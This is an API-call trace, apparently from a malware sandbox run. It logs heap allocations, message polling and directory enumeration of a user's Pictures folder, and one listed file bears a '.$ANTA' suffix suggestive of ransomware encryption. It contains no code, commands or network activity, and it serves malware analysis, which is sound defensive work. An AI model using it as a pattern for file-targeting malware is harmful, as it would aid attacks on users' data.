Size=0x10) returned 0x43c9e00 [0091.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0091.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0091.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0091.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0091.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0091.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0091.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0091.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0091.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0091.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0091.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0091.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0091.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0091.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0091.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0091.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0091.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0091.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0091.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0091.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0091.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0091.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0091.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0091.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0091.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0091.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0091.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0091.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0091.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0091.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0091.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0091.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0091.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0091.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0091.387] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0091.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0091.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0091.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0091.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0091.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0091.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0091.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0091.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0091.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0091.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0091.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0091.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0091.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0091.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0091.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0091.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca178 [0091.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0091.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0091.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x32) returned 0x41ac440 [0091.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0091.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0091.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2190 [0091.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0091.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0091.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0091.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0091.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0091.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0091.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0091.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0091.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0091.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0091.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0091.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0091.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0091.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0091.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0091.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0091.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0091.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0091.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0091.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0091.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0091.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0091.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0091.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0091.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0091.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0091.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0091.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0091.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0091.390] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0091.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0091.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0091.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0091.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0091.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0091.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0091.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0091.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0091.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0091.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0091.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0091.391] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0091.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0091.391] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0091.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0091.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0091.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0091.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2190 [0091.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0091.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0091.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0091.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0091.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0091.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0091.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0091.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0091.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0091.392] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0091.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0091.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0091.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0091.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0091.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0091.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0091.392] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0091.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0091.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0091.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0091.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0091.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0091.393] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0091.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0091.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0091.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0091.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0091.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0091.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0091.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0091.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0091.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0091.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0091.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0091.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ef0 [0091.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0091.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0091.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0091.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0091.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0091.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0091.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0091.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0091.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0091.394] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0091.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0091.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0091.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0091.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0091.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0091.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0091.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0091.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0091.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0091.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0091.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0091.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0091.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0091.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0091.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0091.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0091.395] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0091.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0091.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0091.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0091.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0091.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0091.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0091.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0091.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0091.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0091.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0091.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0091.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0091.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0091.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0091.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0091.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0091.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0091.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0091.396] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\*", lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x29aa9ba, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x29aa9ba, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca178, cFileName=".", cAlternateFileName="")) returned 0x41ac440 [0091.397] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x29aa9ba, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x29aa9ba, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca178, cFileName="..", cAlternateFileName="")) returned 1 [0091.397] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffb75961, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xffb75961, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xffc5cd38, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0xc7f0, dwReserved0=0x0, dwReserved1=0x43ca178, cFileName="0Vl-GMFm9nq0tPej.bmp.$ANTA", cAlternateFileName="0VL-GM~1.$AN")) returned 1 [0091.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0091.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0091.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0091.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0091.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0091.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0091.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0091.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0091.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0091.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0091.397] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0091.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0091.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0091.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0091.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0091.398] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0091.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0091.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0091.398] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0091.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0091.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0091.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0091.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0091.398] RtlAllocateHeap 